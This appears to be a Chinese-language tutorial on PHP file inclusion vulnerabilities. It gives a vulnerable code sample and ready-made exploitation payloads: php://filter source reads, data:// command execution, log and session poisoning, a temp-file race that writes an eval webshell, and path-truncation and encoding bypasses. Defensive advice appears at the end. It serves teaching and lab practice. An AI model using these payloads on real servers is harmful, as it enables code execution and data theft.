漏洞概述：

文件包含漏洞是指客户端(一般为浏览器)用户通过输入控制动态包含在服务器的文件，从而导致恶意代码的执行及敏感信息的泄露，主要包括本地文件包含LFI和远程文件包含RFI两种形式。

产生原因：

在通过 PHP 的函数引入文件时，由于传入的文件名没有经过合理的校验，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入

利用条件：

1、用户能够控制这个动态变量

2、include()等函数通过动态变量的方式引入需要包含的文件

在PHP中，产生文件包含漏洞的几个函数：

include()：

只有代码执行到此函数时才将文件包含进来，发生错误时只警告并继续执行。

require()：

只要程序执行，立即调用此函数包含文件，发生错误时，会输出错误信息并立即终止程序。

include_once()：

功能include()一样，区别在于当重复调用同一文件时，程序只调用一次。

require_once()：

功能require()一样，区别在于当重复调用同一文件时，程序只调用一次。

文件包含功能要实现，需要在PHP的配置文件php.ini中开启allow_url_include；如果是远程文件包含，则除此之外还需要开启allow_url_fopen。

漏洞危害：

读取敏感文件

获取webshell

任意命令执行

在某些情况下，根据LFI漏洞的性质，可以运行系统可执行文件

存在文件包含漏洞的php源码：

$a = @$_GET['file'];

echo 'include $_GET[\'file\']';

if (strpos($a,'flag')!==false) {

die('nonono');

}

include $a;

?>

php.ini配置文件：

allow_url_fopen=off 即不可以包含远程文件。php4存在远程包含&本地包含，php5仅存在本地包含

php伪协议文件包含：

File:// 访问本地文件系统

http:// 访问HTTPs网址

ftp:// 访问ftp URL

Php:// 访问输入输出流

Zlib:// 压缩流

Data:// 数据

Ssh2:// security shell2

Expect:// 处理交互式的流

Glob:// 查找匹配的文件路径

php伪协议文件包含总结：

利用方法：

1、利用file协议执行任意文件读取：

2、利用php伪协议：php://filter查看源代码：

php://filter是一种元封装器，设计用于数据流打开时的筛选过滤应用；在文件包含中用于读取文件内容，读取后输出base64编码后的内容，要获取真实内容的话，需要进行base64解码

?file=php://filter/read=convert.base64-encode/resource=index.php

?file=php://filter/convert.base64-encode/resource=../sss.php

3、session文件包含：

利用条件：

session的存储位置可以获取

session中的内容可以被控制，传入恶意代码

利用思路：

通过参数name写入恶意代码到session文件中，然后通过文件包含漏洞执行此恶意代码getshell

1)、通过phpinfo的信息可以获取到session的存储位置

或者我们可以猜测默认的session存放位置进行尝试。linux下默认存储在/var/lib/php/session目录下

session_start();

$name=$_GET['name'];

$_SESSION["name"]=$name;

?>

此php会将获取到的GET型name变量的值存入到session中，会在/var/lib/php/session目录下存储session的值。

session的文件名为sess_+sessionid，sessionid可以通过查看响应包获取。

4、利用php伪协议：php://input

利用条件：

allow_url_include= On

php <5.0 ，allow_url_include=Off 情况下也可以用

php://input是个可以访问请求的原始数据的只读流。使用时，将要输入的数据以post方式提交

生成一句话木马：

读取目录结构：

5、利用php伪协议：data:

利用条件：

php > 5.2

allow_url_fopen=On && allow_url_include=On

?file=data:text/plain,<?php phpinfo();?>

?file=data:text/plain,<?php system('whoami');?>

?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

6、利用php伪协议：phar://

利用条件：

PHP>= 5.3.0

phar:// 数据流包装器自PHP 5.3.0起开始。这个参数是就是php解压缩包的一个函数，不管目标文件后缀是什么，都将其当做压缩包来解压

用法格式：

?file=phar://压缩包/内部文件

注意：绝对路径或相对路径均可；压缩包只能使用zip协议压缩

使用时有两种方式：

1)、将木马文件压缩后，改为其他任意格式的文件都可以，比如改成txt文件。用zip协议将其压缩为info.zip；然后，将压缩包后缀改为png等其他格式得info.png。

在文件包含时利用方式：phar://xxx.png/xxx.php

使用绝对路径：

2)、无需修改压缩包的后缀名：

7、利用php伪协议：zip://

zip伪协议和phar协议类似(绝对路径或相对路径)，但是用法不一样。

用法：?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名]zip://xxx.png#shell.php或zip://xxx.zip#shell.php。经笔者测试5.2.17 =

8、利用上传点制作图片马，并上传至服务器：

copy book4yi.jpg /b + info.php /a info.jpg

注意：txt文件被包含时也会执行文件中的PHP代码

在相对路径的表示中，符号../表示上一级目录，符合./表示本级目录

对于存在包含漏洞的脚本及文件上传点所在文件夹不同的情况，可利用../翻越到上一级目录进行包含。

9、临时文件包含：

在进行文件上传时，服务器会产生该文件的临时文件，可以在临时文件被删除前使用文件包含获取webshell

一般而言，在Linux系统中，临时文件会保存在目录/tmp下，而Windows系统中会保存在C:\Windows\Temp文件夹下。我们需要关注的重点就是如何获取临时文件名，并且要在临时文件被删除前包含，否则将不能利用。在Linux系统中，临时文件名的命名通过随机函数命名，Windows只有65535个临时文件名。

PHP文件包含漏洞中，如果找不到可以包含的文件，我们可以通过包含临时文件的方法来getshell。因为临时文件名是随机的，如果目标网站上存在phpinfo，则可以通过phpinfo来获取临时文件名，进而进行包含

漏洞原理：

在给PHP发送POST数据包时，如果数据包里包含文件区块，无论你访问的代码中有没有处理文件上传的逻辑，PHP都会将这个文件保存成一个临时文件(通常是/tmp/php[6个随机字符])，文件名可以在$_FILES变量中找到。这个临时文件，在请求结束后就会被删除。

同时，因为phpinfo页面会将当前请求上下文中所有变量都打印出来，所以我们如果向phpinfo页面发送包含文件区块的数据包，则即可在返回包里找到$_FILES变量的内容，自然也包含临时文件名。

利用原理：

文件包含漏洞和phpinfo页面通常是两个页面，理论上我们需要先发送数据包给phpinfo页面，然后从返回页面中匹配出临时文件名，再将这个文件名发送给文件包含漏洞页面，进行getshell，这里需要利用到条件竞争

适用情形：

在文件包含漏洞找不到可利用的文件时，即可利用这个方法，找到临时文件名，然后包含之。

具体过程：

发送包含了webshell的上传数据包给phpinfo页面，这个数据包的header、get等位置需要塞满垃圾数据

因为phpinfo页面会将所有数据都打印出来，1中的垃圾数据会将整个phpinfo页面撑得非常大

php默认的输出缓冲区大小为4096，可以理解为php每次返回4096个字节给socket连接

所以，我们直接操作原生socket，每次读取4096个字节。只要读取到的字符里包含临时文件名，就立即发送第二个数据包

此时，第一个数据包的socket连接实际上还没结束，因为php还在继续每次输出4096个字节，所以临时文件此时还没有删除

利用这个时间差，第二个数据包，也就是文件包含漏洞的利用，即可成功包含临时文件，最终getshell

利用脚本实现上述过程，成功包含临时文件后，会执行<?php file_put_contents('/tmp/g', '<?=eval($_REQUEST[1])?>')?>，写入一个新的文件/tmp/g，这个文件就会永久留在目标机器上

本地用虚拟机复现的时候，发现生成的临时文件并不是在默认的/tmp/目录下，用find命令遍历查找：

日志文件包含：

访问日志：

利用条件：

需要知道服务器日志的存储路径，且日志文件可读

利用原理：

web服务器会将请求写入到日志文件中，比如说apache。在用户发起请求时，会将请求写入access.log，当发生错误时将错误写入error.log

日志存储默认路径：

apache+Linux日志默认路径：/etc/httpd/logs/access.log、/var/log/httpd/access.log、var/log/apache2/access.log、var/log/apache2/error.log

apache+win2003日志默认路径：D:\xampp\apache\logs\access.log、D:\xampp\apache\logs\error.log

IIS6.0+win2003默认日志文件：C:\WINDOWS\system32\Logfiles

IIS7.0+win2003 默认日志文件：%SystemDrive%\inetpub\logs\LogFiles

nginx 日志文件：日志文件在用户安装目录logs目录下,假设安装路径为/usr/local/nginx或者var/log/nginx/,那日志目录就是在/usr/local/nginx/logs或者var/log/nginx/access.log下面

或者可以通过读取相应的配置文件获取log文件路径：

apache+linux 默认配置文件：/etc/httpd/conf/httpd.conf或/etc/init.d/httpd

IIS6.0+win2003 配置文件：C:/Windows/system32/inetsrv/metabase.xml

IIS7.0+WIN 配置文件：C:\Windows\System32\inetsrv\config\applicationHost.config

注意：如果是直接发起请求，会导致一些符号被编码使得包含无法正确解析。可以使用burp截包后修改：

正常的php代码已经写入了/etc/log/apache2/access.log，包含即可执行代码

最开始kali本地复现的时候发现读取文件权限不足：

执行以下命令后复现成功：

chmod 777 -R /var/log/apache2/

SSH log：

利用条件：

需要知道ssh-log的位置，且可读

ssh日志默认路径：

/var/log/auth.log(默认情况下，所有用户都可读)

/var/log/secure

利用过程：

ssh '<?php phpinfo();?>'@192.168.107.129

直接包含其日志文件：

environ文件：

利用条件：

1、php以cgi方式运行，这样environ才会保持UA头

2、environ文件存储位置已知，且有权限访问environ文件

environ文件默认位置：proc/self/environ

由于本地环境不满足，无法进行复现，这里借张别人的图：

利用文件包含漏洞去包含proc/self/environ：

远程文件包含：

自php5.2后，php.ini默认配置下：

allow_url_fopen=on

allow_url_include=off

默认设置下是无法远程包含的,除非网站管理员设置了allow_url_include=on

所以远程包含的可能性很小

远程文件包含绕过技巧：

问号绕过：

?file=http://172.17.82.57/info.php?

#号绕过：

?file=http://172.17.82.57/info.php%23

对于有限制的文件包含：

00截断绕过：

利用条件：

magic_quotes_gpc=off

PHP版本 < 5.3.4

超长文件名截断：

php版本小于5.2.8(?)可以成功，linux需要文件名长于4096，windows需要长于256

http://192.168.107.145/test/1.php?file=../././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././info.php

点号截断：

php版本小于5.2.8(?)可以成功，只适用windows，点号需要长于256

http://192.168.107.145/test/1.php?file=../info.php/...........................................................................................................................................................................................................................................................................................................................................................................................................................................

复现失败

编码绕过：

../：%2e%2e%2f、..%2f、%2e%2e/、

..\：%2e%2e%5c、..%5c、%2e%2e\

# 二次编码绕过：

../：%252e%252e%252f

..\：%252e%252e%255c

防御方案：

过滤危险字符：过滤../和./

配置php.ini文件

设置allow_url_fopen 和 allow_url_include为off

设置文件目录

设置白名单

1、包含目标的参数过滤：

文件名后缀固定：在包含的文件名前后加固定后缀；

文件名过滤：白名单或者黑名单过滤；

2、路径限制：

目录限制，在用户提交的变量前增加固定的路径，限制用户可调用的目录范围；

目录回退符过滤，避免回退符生效导致路径变化；

3、中间件的安全配置：

Magic_quotes_gpc(5.4以后被放弃用)

限制访问区域：php.ini 中设置open_basedir来限制用户访问文件的活动范围等；apache也有相关配置

设置访问权限：限制当前中间件所在用户的访问权限，例如；web服务器独立用户，并且只拥有访问目录和使用中间件的权限，从而有效避免越权访问其他文件；

参考如下：